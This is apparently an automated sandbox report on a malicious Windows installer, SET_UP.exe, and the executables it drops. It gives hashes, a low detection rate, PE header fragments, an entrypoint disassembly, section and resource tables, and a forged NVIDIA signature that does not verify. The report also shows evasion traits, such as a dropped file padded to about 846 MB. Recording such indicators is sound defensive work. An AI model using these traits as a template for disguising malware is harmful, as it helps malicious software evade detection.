                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):846325235
                                                                                                                                                                                                Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\ColorStreamLib\is-FCQ2K.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):846325235
                                                                                                                                                                                                Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):0.5870767528248201
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:SET_UP.exe
                                                                                                                                                                                                File size:76'245'722 bytes
                                                                                                                                                                                                MD5:7e62abcaf3030a9400fb60b5f2ee2484
                                                                                                                                                                                                SHA1:464edfd28fe39ebc0d2dae76660b3c6f1a047864
                                                                                                                                                                                                SHA256:84553c2f4085cc9ed47323ffd1b25bac55e216ba65b9ff45873bf6702da2553e
                                                                                                                                                                                                SHA512:70acf354e63538416f4583f3e535b5f9fc9778ea571629f81c7e00eb2c694c97b55dab4a6b39c8e6f9aafb6aa84eeb86665267fd39317dd2e309f8b18bd8478a
                                                                                                                                                                                                SSDEEP:24576:hqL7dQcuoTT1lzFvE6cW6fra3jZU1qTZrgWax0+F1OO/:hqnPsc6fW9UUTWtl
                                                                                                                                                                                                TLSH:68F7C513B9AAFBB0A7C930788722D9F95DF67C8893129CC7098D3A25F9235D64332535
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... i.gd..4d..4d..4d..4e..4...4n..4...4c..4...4e..4...4b..4...4}..4d..4_..4...4N..4R..4~..4R..4u..4...4e..4Richd..4........PE..L..

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:45c939e17139c851

                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                General

                                                                                                                                                                                                Entrypoint:0x4967be
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:
                                                                                                                                                                                                Time Stamp:0x676BB10D [Wed Dec 25 07:15:25 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:b214bce09c2713602d5f942f9ac78b98

                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                                                                Version:3
                                                                                                                                                                                                Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                                                                Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                                                                Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                                                                Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                Instruction
                                                                                                                                                                                                push ebp
                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                push FFFFFFFFh
                                                                                                                                                                                                push 004DE1C0h
                                                                                                                                                                                                push 0049CBCCh
                                                                                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                mov dword ptr fs:[00000000h], esp
                                                                                                                                                                                                sub esp, 58h
                                                                                                                                                                                                push ebx
                                                                                                                                                                                                push esi
                                                                                                                                                                                                push edi
                                                                                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                call dword ptr [004CE30Ch]
                                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                                mov dl, ah
                                                                                                                                                                                                mov dword ptr [0050B540h], edx
                                                                                                                                                                                                mov ecx, eax
                                                                                                                                                                                                and ecx, 000000FFh
                                                                                                                                                                                                mov dword ptr [0050B53Ch], ecx
                                                                                                                                                                                                shl ecx, 08h
                                                                                                                                                                                                add ecx, edx
                                                                                                                                                                                                mov dword ptr [0050B538h], ecx
                                                                                                                                                                                                shr eax, 10h
                                                                                                                                                                                                mov dword ptr [0050B534h], eax
                                                                                                                                                                                                push 00000001h
                                                                                                                                                                                                call 00007F9A40E0661Eh
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                jne 00007F9A40E002DAh
                                                                                                                                                                                                push 0000001Ch
                                                                                                                                                                                                call 00007F9A40E00397h
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                call 00007F9A40E06329h
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                jne 00007F9A40E002DAh
                                                                                                                                                                                                push 00000010h
                                                                                                                                                                                                call 00007F9A40E00386h
                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                xor esi, esi
                                                                                                                                                                                                mov dword ptr [ebp-04h], esi
                                                                                                                                                                                                call 00007F9A40E06157h
                                                                                                                                                                                                call 00007F9A40E060B1h
                                                                                                                                                                                                mov dword ptr [0050CE94h], eax
                                                                                                                                                                                                call 00007F9A40E05F3Ah
                                                                                                                                                                                                mov dword ptr [0050B520h], eax
                                                                                                                                                                                                call 00007F9A40E05D07h
                                                                                                                                                                                                call 00007F9A40E05C4Ah
                                                                                                                                                                                                call 00007F9A40E03CD6h
                                                                                                                                                                                                mov dword ptr [ebp-30h], esi
                                                                                                                                                                                                lea eax, dword ptr [ebp-5Ch]
                                                                                                                                                                                                push eax
                                                                                                                                                                                                call dword ptr [004CE250h]
                                                                                                                                                                                                call 00007F9A40E05BEEh
                                                                                                                                                                                                mov dword ptr [ebp-64h], eax
                                                                                                                                                                                                test byte ptr [ebp-30h], 00000001h
                                                                                                                                                                                                je 00007F9A40E002D8h
                                                                                                                                                                                                movzx eax, word ptr [ebp-2Ch]

                                                                                                                                                                                                Rich Headers

                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                                                                                                • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xeafa00x104.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x10e0000xc5000.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x48b311a0x39c0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xce0000x7b4.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                Sections

                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000xcce180xcd000fac198aa53afe410c3dcf581545764bdFalse0.5525735994664634data6.720139731616884IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rdata0xce0000x1f9a20x2000083deabb2b79de26612795649a905c4ecFalse0.3486328125data4.995286150286831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0xee0000x1f9c80x1b0004b8dcfd559e7ed4f1f9591313031eb50False0.31859447337962965data4.091038435139011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .rsrc0x10e0000xc50000xc50003c638a11b436c456ebccb0f0f050916cFalse0.3541216390387056data5.653443529273793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                Resources

                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                PNG0x1756280x74dPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0058855002675227
                                                                                                                                                                                                PNG0x175d780x85dPNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0051377860812705
                                                                                                                                                                                                PNG0x176b580x521PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0083777608530085
                                                                                                                                                                                                PNG0x1770800x538PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082335329341316
                                                                                                                                                                                                PNG0x1775b80x557PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008046817849305
                                                                                                                                                                                                PNG0x177b100x550PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080882352941176
                                                                                                                                                                                                PNG0x1780600x57cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078347578347577
                                                                                                                                                                                                PNG0x1785e00x546PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0081481481481482
                                                                                                                                                                                                PNG0x178b280x58fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077301475755447
                                                                                                                                                                                                PNG0x1790b80x534PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082582582582582
                                                                                                                                                                                                PNG0x1795f00x534PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082582582582582
                                                                                                                                                                                                PNG0x1765d80x579PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0078515346181298
                                                                                                                                                                                                RT_CURSOR0x14ab480x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                RT_CURSOR0x14ac980x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5681818181818182
                                                                                                                                                                                                RT_CURSOR0x14ade80x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5487012987012987
                                                                                                                                                                                                RT_CURSOR0x14af380x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4383116883116883
                                                                                                                                                                                                RT_CURSOR0x14b0880x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.41883116883116883
                                                                                                                                                                                                RT_CURSOR0x179b280x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                RT_CURSOR0x179c600xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                RT_CURSOR0x179d400x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                RT_CURSOR0x179e780xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5944444444444444
                                                                                                                                                                                                RT_CURSOR0x179f580x134AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.32142857142857145
                                                                                                                                                                                                RT_CURSOR0x17a0900xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.49444444444444446
                                                                                                                                                                                                RT_CURSOR0x17a1700x134AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\360\037\377\377\370?\377\377\374\177\377\377\376\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.33766233766233766
                                                                                                                                                                                                RT_CURSOR0x17a2a80xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5
                                                                                                                                                                                                RT_CURSOR0x17a3880x134AmigaOS bitmap font "(", fc_YSize 4294966787, 3840 elements, 2nd "\377\003\300\377\377\200\001\377\377\300\003\377\377\340\007\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5616883116883117
                                                                                                                                                                                                RT_CURSOR0x17a4c00xb4Targa image data - RLE 32 x 65536 x 1 +16 "\001"EnglishUnited States0.5444444444444444
                                                                                                                                                                                                RT_BITMAP0x11fce80x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.2413793103448276
                                                                                                                                                                                                RT_BITMAP0x12c5d80x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.015397923875432526
                                                                                                                                                                                                RT_BITMAP0x123e600x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.06548442906574395
                                                                                                                                                                                                RT_BITMAP0x12f3000x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.014186851211072665
                                                                                                                                                                                                RT_BITMAP0x11cfc00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 14173 x 14173 px/mEnglishUnited States0.029238754325259516
                                                                                                                                                                                                RT_BITMAP0x1205100x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.07681660899653979
                                                                                                                                                                                                RT_BITMAP0x1298b00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.07378892733564014
                                                                                                                                                                                                RT_BITMAP0x1145200x2428Device independent bitmap graphic, 96 x 24 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.028630077787381157
                                                                                                                                                                                                RT_BITMAP0x126b880x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.01972318339100346
                                                                                                                                                                                                RT_BITMAP0x1126f80x1e28Device independent bitmap graphic, 80 x 24 x 32, image size 7680, resolution 2835 x 2835 px/mEnglishUnited States0.03212435233160622
                                                                                                                                                                                                RT_BITMAP0x11a2980x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.10043252595155709
                                                                                                                                                                                                RT_BITMAP0x1169480xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17834190231362468
                                                                                                                                                                                                RT_BITMAP0x1175700x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.014359861591695501
                                                                                                                                                                                                RT_BITMAP0x1232380xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 101857 x 101857 px/mEnglishUnited States0.09318766066838047
                                                                                                                                                                                                RT_BITMAP0x10f9d00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 120945 x 120945 px/mEnglishUnited States0.08295847750865051
                                                                                                                                                                                                RT_BITMAP0x1320280x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.07179930795847751
                                                                                                                                                                                                RT_BITMAP0x134d500x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.10294117647058823
                                                                                                                                                                                                RT_BITMAP0x137d400x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/mEnglishUnited States0.06870538611291369
                                                                                                                                                                                                RT_BITMAP0x13efb80x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 18142 x 18142 px/mEnglishUnited States0.04835640138408304
                                                                                                                                                                                                RT_BITMAP0x137a780x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/mEnglishUnited States0.0800561797752809
                                                                                                                                                                                                RT_BITMAP0x1465080x1b8Device independent bitmap graphic, 20 x 5 x 32, image size 400, resolution 151181 x 151181 px/mEnglishUnited States0.2590909090909091
                                                                                                                                                                                                RT_BITMAP0x141ce00x4828Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 30236 x 30236 px/mEnglishUnited States0.03621697704634041
                                                                                                                                                                                                RT_BITMAP0x13ad680x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 101857 x 101857 px/mEnglishUnited States0.06327060350421804
                                                                                                                                                                                                RT_BITMAP0x13dd900x1228Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/mEnglishUnited States0.21493115318416522
                                                                                                                                                                                                RT_BITMAP0x1466c00x268Device independent bitmap graphic, 6 x 24 x 32, image size 576, resolution 151181 x 151181 px/mEnglishUnited States0.14123376623376624
                                                                                                                                                                                                RT_BITMAP0x1469280x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.19061302681992337
                                                                                                                                                                                                RT_BITMAP0x1471500x108Device independent bitmap graphic, 28 x 2 x 32, image size 224, resolution 2835 x 2835 px/mEnglishUnited States0.1856060606060606
                                                                                                                                                                                                RT_BITMAP0x1472580x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 2835 x 2835 px/mEnglishUnited States0.15373563218390804
                                                                                                                                                                                                RT_BITMAP0x147a800x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 2835 x 2835 px/mEnglishUnited States0.0997191011235955
                                                                                                                                                                                                RT_BITMAP0x147d480x48Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/mEnglishUnited States0.4166666666666667
                                                                                                                                                                                                RT_BITMAP0x147d900x868Device independent bitmap graphic, 66 x 8 x 32, image size 2112, resolution 2835 x 2835 px/mEnglishUnited States0.0766728624535316
                                                                                                                                                                                                RT_BITMAP0x17a5a00x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404EnglishUnited States0.34615384615384615
                                                                                                                                                                                                RT_BITMAP0x17ac700xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                RT_BITMAP0x17ad280x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260EnglishUnited States0.28296703296703296
                                                                                                                                                                                                RT_BITMAP0x17ae980x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                RT_ICON0x14ca000x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x150c280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x1531d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x1542780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x1547200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1589480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x15aef00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x15bf980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x15c4400x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1606680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x162c100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x163cb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x1641600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1683880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x16a9300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x16b9d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_ICON0x16be800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                                RT_ICON0x1700a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                                RT_ICON0x1726500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                                RT_ICON0x1736f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                                RT_MENU0x173ba00x94eMatlab v4 mat-file (little endian) O, numeric, rows 4587536, columns 7077993, imaginaryEnglishUnited States0.35516372795969775
                                                                                                                                                                                                RT_MENU0x1744f00x1138dataEnglishUnited States0.22549909255898368
                                                                                                                                                                                                RT_DIALOG0x14c0f80x284dataEnglishUnited States0.5295031055900621
                                                                                                                                                                                                RT_DIALOG0x14c8280x18edataEnglishUnited States0.6080402010050251
                                                                                                                                                                                                RT_DIALOG0x14b8800x54adataEnglishUnited States0.37961595273264404
                                                                                                                                                                                                RT_DIALOG0x14bdd00x14adataEnglishUnited States0.6212121212121212
                                                                                                                                                                                                RT_DIALOG0x14b5300x34edataEnglishUnited States0.450354609929078
                                                                                                                                                                                                RT_DIALOG0x14bf200x1d2dataEnglishUnited States0.5
                                                                                                                                                                                                RT_DIALOG0x14b1d80x16adataEnglishUnited States0.6353591160220995
                                                                                                                                                                                                RT_DIALOG0x14c6600x11adataEnglishUnited States0.6418439716312057
                                                                                                                                                                                                RT_DIALOG0x14b3480x1e2dataEnglishUnited States0.6182572614107884
                                                                                                                                                                                                RT_DIALOG0x14c5480x112dataEnglishUnited States0.6240875912408759
                                                                                                                                                                                                RT_DIALOG0x14c3800x1c6dataEnglishUnited States0.5925110132158591
                                                                                                                                                                                                RT_DIALOG0x14c7800xa4dataEnglishUnited States0.7560975609756098
                                                                                                                                                                                                RT_DIALOG0x17ab880xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                RT_STRING0x17afe00xdadataEnglishUnited States0.41284403669724773
                                                                                                                                                                                                RT_STRING0x17b0c00x34dataEnglishUnited States0.5769230769230769
                                                                                                                                                                                                RT_STRING0x17b0f80x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                RT_STRING0x17b1800x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                RT_STRING0x17b1b00x14adataEnglishUnited States0.5060606060606061
                                                                                                                                                                                                RT_STRING0x17b3000x4e2dataEnglishUnited States0.376
                                                                                                                                                                                                RT_STRING0x17bb780x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                                                                                                RT_STRING0x17b8980x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                                                                                                RT_STRING0x17b7e80xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                RT_STRING0x17c5500xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                RT_STRING0x17be200x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                                                                                                RT_STRING0x17c2e80x264dataEnglishUnited States0.3741830065359477
                                                                                                                                                                                                RT_STRING0x17c6300x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                RT_ACCELERATOR0x1485f80x120dataEnglishUnited States0.5381944444444444
                                                                                                                                                                                                RT_GROUP_CURSOR0x14add00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                RT_GROUP_CURSOR0x14b0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                RT_GROUP_CURSOR0x14b1c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
